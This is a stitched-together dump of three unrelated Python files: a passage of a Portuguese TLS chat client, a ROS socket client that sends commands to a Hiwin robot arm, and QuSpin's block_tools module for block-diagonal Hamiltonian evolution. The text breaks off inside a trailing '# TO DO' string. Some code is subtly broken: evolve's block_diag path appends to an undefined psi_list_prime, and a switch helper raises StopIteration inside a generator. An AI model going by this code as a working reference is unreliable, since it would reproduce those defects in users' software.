clientSocket = ssl.wrap_socket(clientSocket,
ca_certs="server.crt",
cert_reqs=ssl.CERT_REQUIRED)
clientSocket.connect((serverName,serverPort))
listener = socket(AF_INET, SOCK_STREAM)
listener.bind(('', chatPort))
listener.listen(5)
sender = socket(AF_INET, SOCK_STREAM)
#Comeca heartbeat
hb = Heartbeat(clientSocket, 1)
t = threading.Thread(target = hb.beat)
t.start()
#Comeca listener
lskt = ListenerSocket()
t2 = threading.Thread(target = lskt.listen)
t2.start()
usuario = "anonymous"
try:
while 1:
comando = input('Escreva a mensagem: ')
if (chatting):
if(comando.split()[0] == "FILE"):
writer.send(comando)
elif(comando.split()[0] == "DISCONNECT"):
writer.send(comando)
writer.disconnect()
else:
writer.send(comando)
else:
mensagem = ""
if( comando=="login" ):
usuario = input('Escreva seu nickname: ')
mensagem = "LOGIN " + usuario + " " + str(chatPort)
envia(mensagem, clientSocket)
data = clientSocket.recv(2048).decode('utf-8')
if (data.split()[0] == "OK"):
print("Login feito com sucesso")
else:
print("Login falhou")
usuario = "anonymous"
continue
hb.beating = True
elif( comando=="list" ):
mensagem = "LIST"
envia(mensagem, clientSocket)
data = clientSocket.recv(2048).decode('utf-8')
words = data.split('\n')
print("Lista de usuários:")
for word in words:
print (word)
elif( comando=="logout" ):
mensagem = "LOGOUT " + usuario
envia(mensagem, clientSocket)
hb.beating = False
elif( comando=="quit" or comando=="exit"):
hb.on = False
envia("CLOSE", clientSocket)
break
elif( comando == "chat"):
buddy = input('Escreva o nick do usuario com quem deseja conversar: ')
envia("CHAT " + usuario + " " + buddy, clientSocket)
data = clientSocket.recv(2048).decode('utf-8')
print (data)
if data.split()[0] == "NOK":
print("Failed: Cannot start chat")
continue
else:
print("You started a connection with %s" %buddy)
buddyip = data.split()[1]
buddyport = (int)(data.split()[2])
print (buddyip)
print (buddyport)
chatting = True
writer = TCPWriter(buddyip,buddyport)
writer.connect()
myip = clientSocket.getpeername()[0]
writer.send("CONN "+ myip + " " + str(chatPort) + " " + usuario)
except (KeyboardInterrupt, SystemExit):
print ('\nReceived keyboard interrupt, quitting program.')
hb.on = False
clientSocket.close()
hb.on = False
clientSocket.close()
|
Hiwin_RT605_ArmCommand_Socket_20190627184253.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,data
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", Socket)
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
block_tools.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division
# QuSpin modules
# numpy modules
import numpy as _np # generic math functions
# _scipy modules
import scipy as _scipy
import scipy.sparse as _sp
from scipy.sparse.linalg import expm_multiply as _expm_multiply
# multi-processing modules
from multiprocessing import Process as _Process
from multiprocessing import Queue as _Queue
from multiprocessing import Event as _Event
from joblib import Parallel as _Parallel
from joblib import delayed as _delayed
# six for python 2.* and 3.* dictionary compatibility
from six import iteritems as _iteritems
from six import itervalues as _itervalues
try:
from itertools import izip as _izip
except ImportError:
_izip = zip
__all__=["block_diag_hamiltonian","block_ops"]
def block_diag_hamiltonian(blocks,static,dynamic,basis_con,basis_args,dtype,basis_kwargs={},get_proj_kwargs={},get_proj=True,check_symm=True,check_herm=True,check_pcon=True):
"""Block-diagonalises a Hamiltonian obeying a symmetry.
The symmetry blocks are created via the argument 'blocks'.
Examples
--------
The example below demonstrates how to to use the `block_diag_hamiltonian()` function to block-diagonalise
the single-particle Hamiltonian
.. math::
H=\\sum_j (J+(-1)^j\\delta J)b^\\dagger_{j+1} b_j + \\mathrm{h.c.} + \\Delta(-1)^j b^\\dagger_j b_j
with respect to translation symemtry. The Fourier transform is computed along the way.
.. literalinclude:: ../../doc_examples/block_diag_hamiltonian-example.py
:linenos:
:language: python
:lines: 7-
Parameters
-----------
blocks : list/tuple/iterator
Contains the symmetry blocks to construct the Hamiltonian with, as dictionaries.
static : list
Static operator list used to construct the block Hamiltonians. Follows `hamiltonian` format.
dynamic : list
Dynamic operator list used to construct the block Hamiltonians. Follows `hamiltonian` format.
basis_con : :obj:`basis`
Basis constructor used to build the basis objects to create the block diagonal Hamiltonians.
basis_args : tuple
This argument is passed as the first argument for `basis_con`.
Contains all required arguments for the basis.
dtype : 'type'
The data type (e.g. numpy.float64) to construct the Hamiltonian with.
get_proj : bool, optional
Flag which tells the function to calculate and return the projector to the
symmetry-block subpace requested. Default is 'True'.
basis_kwargs : dict, optional
Dictionary of keyword arguments to add when calling `basis` constructor.
get_proj_kwargs : dict, optional
Dictionary of keyword arguments for `basis.get_proj()` and `basis.project_from()`.
check_symm : bool, optional
Enable/Disable symmetry check of the operators for the first Hamiltonian constructed.
check_herm : bool, optional
Enable/Disable hermiticity check of the operators for the first Hamiltonian constructed.
check_pcon : bool, optional
Enable/Disable particle conservation check of the operators for the first Hamiltonian constructed.
Returns
--------
tuple
P : scipy.sparse.csr
Projector to the symmetr-block subspace (e.g. Fourier transform in case of momentum blocks).
H : `obj`
`hamiltonian` object in block diagonal form.
Raises
------
ValueError
If `blocks` is not a list of `hamiltonian` objects or a list of dictionaries containing
the symmetry sectors.
"""
from ..operators import hamiltonian
H_list = []
P_list = []
blocks = list(blocks)
if all([isinstance(block,dict) for block in blocks]):
[blocks[i].update(basis_kwargs) for i in range(len(blocks))]
dynamic_list = [(tup[-2],tuple(tup[-1])) for tup in dynamic]
dynamic_list = [([],f,f_args) for f,f_args in set(dynamic_list)]
static_mats = []
for block in blocks:
b = basis_con(*basis_args,**block)
if get_proj:
P = b.get_proj(dtype,**get_proj_kwargs)
P_list.append(P)
H = hamiltonian(static,dynamic,basis=b,dtype=dtype,check_symm=check_symm,check_herm=check_herm,check_pcon=check_pcon)
check_symm = False
check_herm = False
check_pcon = False
static_mats.append(H.static.tocoo())
for i,Hd in enumerate(_itervalues(H.dynamic)):
dynamic_list[i][0].append(Hd.tocoo())
static = [_sp.block_diag(static_mats,format="csr")]
dynamic = []
for mats,f,f_args in dynamic_list:
mats = _sp.block_diag(mats,format="csr")
dynamic.append([mats,f,f_args])
else:
raise ValueError("blocks must be list of dictionaries containing symmetry sectors.")
if get_proj:
P = _sp.hstack(P_list,format="csr")
return P,hamiltonian(static,dynamic,copy=False)
else:
return hamiltonian(static,dynamic,copy=False)
def _worker(gen_func,args_list,q,e):
"""
Worker function which loops over one of more generators provided by `gen_func` and returns the result
via queue `q`.
Waits for signal from `e` before continuing.
"""
gens = []
for arg in args_list:
gens.append(gen_func(*arg))
generator = _izip(*gens)
for s in generator:
e.clear()
q.put(s)
e.wait()
q.close()
def _generate_parallel(n_process,n_iter,gen_func,args_list):
"""
Generator which spawns processes to run generators, then uses a queue for each process to retrieve
the results which it then yields.
"""
n_items = len(args_list)
# calculate how to distribute generators over processes.
if n_items <= n_process and n_process > 0:
n_process = n_items
n_pp = 1
n_left = 1
elif n_items > n_process and n_process > 0:
n_pp = n_items//n_process
n_left = n_pp + n_items%n_process
# if one process specified just do the generator without sub processes.
if n_process <= 1:
gens = []
for arg in args_list:
gens.append(gen_func(*arg))
generator = _izip(*gens)
for s in generator:
yield s
return
# split up argument list
sub_lists = [args_list[0:n_left]]
sub_lists.extend([ args_list[n_left + i*n_pp:n_left + (i+1)*n_pp] for i in range(n_process-1)])
# create lists of queues, events, and processes.
es = []
qs = []
ps = []
for i in range(n_process):
e = _Event()
q = _Queue(1)
p = _Process(target=_worker, args=(gen_func,sub_lists[i],q,e))
p.daemon = True
es.append(e)
qs.append(q)
ps.append(p)
# start processes
for p in ps:
p.start()
# for number of iterations
for i in range(n_iter):
s = []
# retrieve results for each sub-process and let the process know to continue calculation.
for q,e in _izip(qs,es):
s.extend(q.get())
e.set() # free process to do next calculation
# yield all results
yield tuple(s)
# end processes
for p in ps:
p.join()
def _evolve_gen(psi,H,t0,times,stack_state,imag_time,solver_name,solver_args):
"""Generating function for evolution with `H.evolve`."""
for psi in H.evolve(psi,t0,times,stack_state=stack_state,imag_time=imag_time,solver_name=solver_name,iterate=True,**solver_args):
yield psi
def _expm_gen(psi,H,times,dt):
"""Generating function for evolution via `_expm_multiply`."""
if times[0] != 0:
H *= times[0]
psi = _expm_multiply(H,psi)
H /= times[0]
yield psi
H *= dt
for t in times[1:]:
psi = _expm_multiply(H,psi)
yield psi
H /= dt
def _block_evolve_iter(psi_blocks,H_list,P,t0,times,stack_state,imag_time,solver_name,solver_args,n_jobs):
"""using `_generate_parallel` to get block evolution yields state in full H-space."""
args_list = [(psi_blocks[i],H_list[i],t0,times,stack_state,imag_time,solver_name,solver_args) for i in range(len(H_list))]
for psi_blocks in _generate_parallel(n_jobs,len(times),_evolve_gen,args_list):
psi_t = _np.hstack(psi_blocks)
yield P.dot(psi_t)
def _block_expm_iter(psi_blocks,H_list,P,start,stop,num,endpoint,n_jobs):
"""using `_generate_parallel` to get block evolution yields state in full H-space."""
times,dt = _np.linspace(start,stop,num=num,endpoint=endpoint,retstep=True)
args_list = [(psi_blocks[i],H_list[i],times,dt) for i in range(len(H_list))]
for psi_blocks in _generate_parallel(n_jobs,len(times),_expm_gen,args_list):
psi_t = _np.hstack(psi_blocks)
yield P.dot(psi_t)
def _block_evolve_helper(H,psi,t0,times,stack_state,imag_time,solver_name,solver_args):
"""helper functions for doing evolution not with iterator."""
return H.evolve(psi,t0,times,stack_state=stack_state,imag_time=imag_time,solver_name=solver_name,**solver_args)
class block_ops(object):
"""Splits up the dynamics of a state over various symmetry sectors.
Particularly useful if the initial state does NOT obey a symmetry but the hamiltonian does.
Moreover, we provide a multiprocessing option which allows the user to split up the dynamics
over multiple processing cores.
Can be used to calculate nonequal time correlators in symmetry-reduced sectors.
Notes
-----
The `block_ops` object is initialised only after calling the function methods of the class to save memory.
Examples
--------
The following sequence of examples uses the Bose-Hubbard model
.. math::
H=-J\\sum_j b^\\dagger_{j+1}b_j + \\mathrm{h.c.} + \\frac{U}{2}\\sum_j n_j(n_j-1)
to show how to use the `block_ops` class to evolve a Fock state, which explicitly breaks
translational invariance, by decomposing it in all momentum blocks, time-evolving the projections, and putting
the state back together in the Fock basis in the end. We use the time-evolved state to measure the local density operator :math:`n_j`.
The code snippets for the time evolution can be found in the examples for the function methods of the class.
The code snippet below initiates the class, and is required to run the example codes for the function methods.
.. literalinclude:: ../../doc_examples/block_ops-example.py
:linenos:
:language: python
:lines: 7-55
"""
def __init__(self,blocks,static,dynamic,basis_con,basis_args,dtype,basis_kwargs={},get_proj_kwargs={},save_previous_data=True,compute_all_blocks=False,check_symm=True,check_herm=True,check_pcon=True):
"""Instantiates the `block_ops` class.
Parameters
-----------
blocks : list/tuple/iterator
Contains the symmetry blocks to construct the Hamiltonian with,
as dictionaries or `hamiltonian` objects.
static : list
Static operator list used to construct the block Hamiltonians. Follows `hamiltonian` format.
dynamic : list
Dynamic operator list used to construct the block Hamiltonians. Follows `hamiltonian` format.
basis_con : :obj:`basis`
Basis constructor used to build the basis objects to create the block diagonal Hamiltonians.
basis_args : tuple
This argument is passed as the first argument for `basis_con`.
Contains all required arguments for the basis.
dtype : 'type'
The data type (e.g. numpy.float64) to construct the Hamiltonian with.
basis_kwargs : dict, optional
Dictionary of keyword arguments to add when calling `basis` constructor.
get_proj_kwargs : dict, optional
Dictionary of keyword arguments for `basis.get_proj()` and `basis.project_from()`.
save_previous_data : bool, optional
To do time evolution the `block_ops` class constructs Hamiltonians, which can take time.
Set this flag to `True`, and the class will save previously calculated Hamiltonians, so
next time one needs to do evolution in that block, the code does NOT have to calculate it again.
Default is `True`.
compute_all_blocks : bool, optional
Flag which tells the `block_ops` class to compute all symmetry blocks at initialization.
Default is `False`.
This option sets `save_previous_data = True` automatically.
check_symm : bool, optional
Enable/Disable symmetry check of the operators for the first Hamiltonian constructed.
check_herm : bool, optional
Enable/Disable hermiticity check of the operators for the first Hamiltonian constructed.
check_pcon : bool, optional
Enable/Disable particle conservation check of the operators for the first Hamiltonian constructed.
"""
self._basis_dict = {}
self._H_dict = {}
self._P_dict = {}
self._dtype=dtype
self._save = save_previous_data
self._static = static
self._dynamic = dynamic
self._checks = {"check_symm":check_symm,"check_herm":check_herm,"check_pcon":check_pcon}
self._no_checks = {"check_symm":False,"check_herm":False,"check_pcon":False}
self._checked = False
self._get_proj_kwargs = get_proj_kwargs
for block in blocks:
block.update(basis_kwargs)
b = basis_con(*basis_args,**block)
if b.Ns > 0:
self._basis_dict[str(block)]=b
if compute_all_blocks:
self._save=True
self.compute_all_blocks()
@property
def dtype(self):
"""type: numpy data type to store the block hamiltonians in."""
return self._dtype
@property
def save_previous_data(self):
"""bool: reflects state of optimal argument `save_previous_data`."""
return self._save
@property
def H_dict(self):
"""dict: dictionary which contains the block Hamiltonians under keys labelled by the symmetry blocks,
e.g. `str(block)` where `block` is a block dictionary variable.
"""
return self._H_dict
@property
def P_dict(self):
"""dict: dictionary which contains the block projectors under keys labelled by the symmetry blocks,
e.g. `str(block)` where `block` is a block dictionary variable.
"""
return self._P_dict
@property
def basis_dict(self):
"""dict: dictionary which contains the `basis` objects under keys labelled by the symmetry blocks,
e.g. `str(block)` where `block` is a block dictionary variable.
"""
return self._basis_dict
@property
def static(self):
"""list: contains the static operators used to construct the symmetry-block Hamiltonians."""
return list(self._static)
@property
def dynamic(self):
"""list: contains the dynamic operators used to construct the symmetry-block Hamiltonians."""
return list(self._dynamic)
def update_blocks(self,blocks,basis_con,basis_args,compute_all_blocks=False):
"""Allows to update the `blocks` variable of the class.
Parameters
-----------
blocks : list/tuple/iterator
Contains the new symmetry blocks to be added to the `basis_dict` attribute of the class,
as dictionaries or `hamiltonian` objects.
basis_con : :obj:`basis`
Basis constructor used to build the basis objects to create the new block diagonal Hamiltonians.
basis_args : tuple
This argument is passed as the first argument for `basis_con`.
Contains all required arguments for the basis.
compute_all_blocks : bool, optional
Flag which tells the `block_ops` class to compute all symmetry blocks at initialization.
Default is `False`.
"""
blocks = list(blocks)
for block in blocks:
if str(block) not in self._basis_dict.keys():
b = basis_con(*basis_args,**block)
if b.Ns > 0:
self._basis_dict[str(block)]=b
if compute_all_blocks:
self.compute_all_blocks()
def compute_all_blocks(self):
"""Sets `compute_all_blocks = True`.
Examples
--------
The example below builds on the code snippet shown in the description of the `block_ops` class.
.. literalinclude:: ../../doc_examples/block_ops-example.py
:linenos:
:language: python
:lines: 57-58
"""
from ..operators import hamiltonian
for key,b in _iteritems(self._basis_dict):
if self._P_dict.get(key) is None:
p = b.get_proj(self.dtype,**self._get_proj_kwargs)
self._P_dict[key] = p
if self._H_dict.get(key) is None:
if not self._checked:
H = hamiltonian(self._static,self._dynamic,basis=b,dtype=self.dtype,**self._checks)
self._checked=True
else:
H = hamiltonian(self._static,self._dynamic,basis=b,dtype=self.dtype,**self._no_checks)
self._H_dict[key] = H
def _get_P(self,key):
if self._P_dict.get(key) is None:
p = self._basis_dict[key].get_proj(self.dtype,**self._get_proj_kwargs)
if self._save:
self._P_dict[key] = p
return p
else:
return self._P_dict[key]
def _get_H(self,key):
from ..operators import hamiltonian
if self._H_dict.get(key) is None:
if not self._checked:
H = hamiltonian(self._static,self._dynamic,basis=self._basis_dict[key],dtype=self.dtype,**self._checks)
self._checked=True
else:
H = hamiltonian(self._static,self._dynamic,basis=self._basis_dict[key],dtype=self.dtype,**self._no_checks)
if self._save:
self._H_dict[key] = H
return H
else:
return self._H_dict[key]
def evolve(self,psi_0,t0,times,iterate=False,n_jobs=1,block_diag=False,stack_state=False,imag_time=False,solver_name="dop853",**solver_args):
"""Creates symmetry blocks of the Hamiltonian and then uses them to run `hamiltonian.evolve()` in parallel.
**Arguments NOT described below can be found in the documentation for the `hamiltonian.evolve()` method.**
Examples
--------
The example below builds on the code snippet shown in the description of the `block_ops` class.
.. literalinclude:: ../../doc_examples/block_ops-example.py
:linenos:
:language: python
:lines: 69-
Parameters
-----------
psi_0 : numpy.ndarray, list, tuple
Quantum state which defined on the full Hilbert space of the problem.
Does not need to obey and sort of symmetry.
t0 : float
Inistial time to start the evolution at.
times : numpy.ndarray, list
Contains the times to compute the solution at. Must be some an iterable object.
iterate : bool, optional
Flag to return generator when set to `True`. Otherwise the output is an array of states.
Default is 'False'.
n_jobs : int, optional
Number of processes requested for the computation time evolution dynamics.
NOTE: one of those processes is used to gather results. For best performance, all blocks
should be approximately the same size and `n_jobs-1` must be a common devisor of the number of
blocks, such that there is roughly an equal workload for each process. Otherwise the computation
will be as slow as the slowest process.
block_diag : bool, optional
When set to `True`, this flag puts the Hamiltonian matrices for the separate symemtry blocks
into a list and then loops over it to do time evolution. When set to `False`, it puts all
blocks in a single giant sparse block diagonal matrix. Default is `False`.
This flag is useful if there are a lot of smaller-sized blocks.
Returns
--------
obj
if `iterate = True`, returns generator which generates the time dependent state in the
full H-space basis.
if `iterate = False`, returns `numpy.ndarray` which has the time-dependent states in the
full H-space basis in the rows.
Raises
------
ValueError
Variable `imag_time=True` option on `hamiltonian.evolve()` method not supported.
ValueError
`iterate=True` requires `times` to be an array or a list.
RuntimeError
Terminates when initial state has no projection onto the specified symmetry blocks.
"""
if imag_time:
raise ValueError("imaginary time not supported for block evolution.")
P = []
H_list = []
psi_blocks = []
for key,b in _iteritems(self._basis_dict):
p = self._get_P(key)
if _sp.issparse(psi_0):
psi = p.H.dot(psi_0).toarray()
else:
psi = p.H.dot(psi_0)
psi = _np.asarray(psi).ravel()
if _np.linalg.norm(psi) > 1000*_np.finfo(self.dtype).eps:
psi_blocks.append(psi)
P.append(p.tocoo())
H_list.append(self._get_H(key))
if block_diag and H_list:
N_H = len(H_list)
n_pp = N_H//n_jobs
n_left = n_pp + N_H%n_jobs
H_list_prime = []
psi_blocks_prime = []
if n_left != 0:
H_list_prime.append(block_diag_hamiltonian(H_list[:n_left],None,None,None,None,self._dtype,get_proj=False,**self._no_checks))
psi_list_prime.append(_np.hstack(psi_blocks[:n_left]))
for i in range(n_jobs-1):
i1 = n_left + i*n_pp
i2 = n_left + (i+1)*n_pp
H_list_prime.append(block_diag_hamiltonian(H_list[i1:i2],None,None,None,None,self._dtype,get_proj=False,**self._no_checks))
psi_list_prime.append(_np.hstack(psi_blocks[i1:i2]))
H_list = H_list_prime
psi_blocks = psi_blocks_prime
if len(H_list) > 0:
P = _sp.hstack(P,format="csr")
if iterate:
if _np.isscalar(times):
raise ValueError("If iterate=True times must be a list/array.")
return _block_evolve_iter(psi_blocks,H_list,P,t0,times,stack_state,imag_time,solver_name,solver_args,n_jobs)
else:
psi_t = _Parallel(n_jobs = n_jobs)(_delayed(_block_evolve_helper)(H,psi,t0,times,stack_state,imag_time,solver_name,solver_args) for psi,H in _izip(psi_blocks,H_list))
psi_t = _np.vstack(psi_t)
psi_t = P.dot(psi_t)
return psi_t
else:
raise RuntimeError("initial state has no projection on to specified blocks.")
def expm(self,psi_0,H_time_eval=0.0,iterate=False,n_jobs=1,block_diag=False,a=-1j,start=None,stop=None,endpoint=None,num=None,shift=None):
"""Creates symmetry blocks of the Hamiltonian and then uses them to run `_expm_multiply()` in parallel.
**Arguments NOT described below can be found in the documentation for the `exp_op` class.**
Examples
--------
The example below builds on the code snippet shown in the description of the `block_ops` class.
.. literalinclude:: ../../doc_examples/block_ops-example.py
:linenos:
:language: python
:lines: 60-67
Parameters
-----------
psi_0 : numpy.ndarray, list, tuple
Quantum state which defined on the full Hilbert space of the problem.
Does not need to obey and sort of symmetry.
t0 : float
Inistial time to start the evolution at.
H_time_eval : numpy.ndarray, list
Times to evaluate the Hamiltonians at when doing the matrix exponentiation.
iterate : bool, optional
Flag to return generator when set to `True`. Otherwise the output is an array of states.
Default is 'False'.
n_jobs : int, optional
Number of processes requested for the computation time evolution dynamics.
NOTE: one of those processes is used to gather results. For best performance, all blocks
should be approximately the same size and `n_jobs-1` must be a common devisor of the number of
blocks, such that there is roughly an equal workload for each process. Otherwise the computation
will be as slow as the slowest process.
block_diag : bool, optional
When set to `True`, this flag puts the Hamiltonian matrices for the separate symemtri blocks
into a list and then loops over it to do time evolution. When set to `False`, it puts all
blocks in a single giant sparse block diagonal matrix. Default is `False`.
This flag is useful if there are a lot of smaller-sized blocks.
Returns
--------
obj
if `iterate = True`, returns generator which generates the time dependent state in the
full H-space basis.
if `iterate = False`, returns `numpy.ndarray` which has the time-dependent states in the
full H-space basis in the rows.
Raises
------
ValueError
Various `ValueError`s of `exp_op` class.
RuntimeError
Terminates when initial state has no projection onto the specified symmetry blocks.
"""
from ..operators import hamiltonian
if iterate:
if start is None and stop is None:
raise ValueError("'iterate' can only be True with time discretization. must specify 'start' and 'stop' points.")
if num is not None:
if type(num) is not int:
raise ValueError("expecting integer for 'num'.")
else:
num = 50
if endpoint is not None:
if type(endpoint) is not bool:
raise ValueError("expecting bool for 'endpoint'.")
else:
endpoint = True
else:
if start is None and stop is None:
if num != None:
raise ValueError("unexpected argument 'num'.")
if endpoint != None:
raise ValueError("unexpected argument 'endpoint'.")
else:
if not (_np.isscalar(start) and _np.isscalar(stop)):
raise ValueError("expecting scalar values for 'start' and 'stop'")
if not (_np.isreal(start) and _np.isreal(stop)):
raise ValueError("expecting real values for 'start' and 'stop'")
if num is not None:
if type(num) is not int:
raise ValueError("expecting integer for 'num'.")
else:
num = 50
if endpoint is not None:
if type(endpoint) is not bool:
raise ValueError("expecting bool for 'endpoint'.")
else:
endpoint = True
P = []
H_list = []
psi_blocks = []
for key,b in _iteritems(self._basis_dict):
p = self._get_P(key)
if _sp.issparse(psi_0):
psi = p.H.dot(psi_0).toarray()
else:
psi = p.H.dot(psi_0)
psi = psi.ravel()
if _np.linalg.norm(psi) > 1000*_np.finfo(self.dtype).eps:
psi_blocks.append(psi)
P.append(p.tocoo())
H = self._get_H(key)
H = H(H_time_eval)*a
if shift is not None:
H += a*shift*_sp.identity(b.Ns,dtype=self.dtype)
H_list.append(H)
if block_diag and H_list:
N_H = len(H_list)
n_pp = N_H//n_jobs
n_left = n_pp + N_H%n_jobs
H_list_prime = []
psi_blocks_prime = []
psi_block = _np.hstack(psi_blocks[:n_left])
H_block = _sp.block_diag(H_list[:n_left],format="csr")
H_list_prime.append(H_block)
psi_blocks_prime.append(psi_block)
for i in range(n_jobs-1):
i1 = n_left + i*n_pp
i2 = n_left + (i+1)*n_pp
psi_block = _np.hstack(psi_blocks[i1:i2])
H_block = _sp.block_diag(H_list[i1:i2],format="csr")
H_list_prime.append(H_block)
psi_blocks_prime.append(psi_block)
H_list = H_list_prime
psi_blocks = psi_blocks_prime
H_is_complex = _np.iscomplexobj([_np.float32(1.0).astype(H.dtype) for H in H_list])
if H_list:
P = _sp.hstack(P,format="csr")
if iterate:
return _block_expm_iter(psi_blocks,H_list,P,start,stop,num,endpoint,n_jobs)
else:
ver = [int(v) for v in _scipy.__version__.split(".")]
if H_is_complex and (start,stop,num,endpoint) != (None,None,None,None) and ver[1] < 19:
mats = _block_expm_iter(psi_blocks,H_list,P,start,stop,num,endpoint,n_jobs)
return _np.array([mat for mat in mats]).T
else:
psi_t = _Parallel(n_jobs = n_jobs)(_delayed(_expm_multiply)(H,psi,start=start,stop=stop,num=num,endpoint=endpoint) for psi,H in _izip(psi_blocks,H_list))
psi_t = _np.hstack(psi_t).T
psi_t = P.dot(psi_t)
return psi_t
else:
raise RuntimeError("initial state has no projection on to specified blocks.")
'''
# TO DO
=======
class block_diag_ensemble(object):
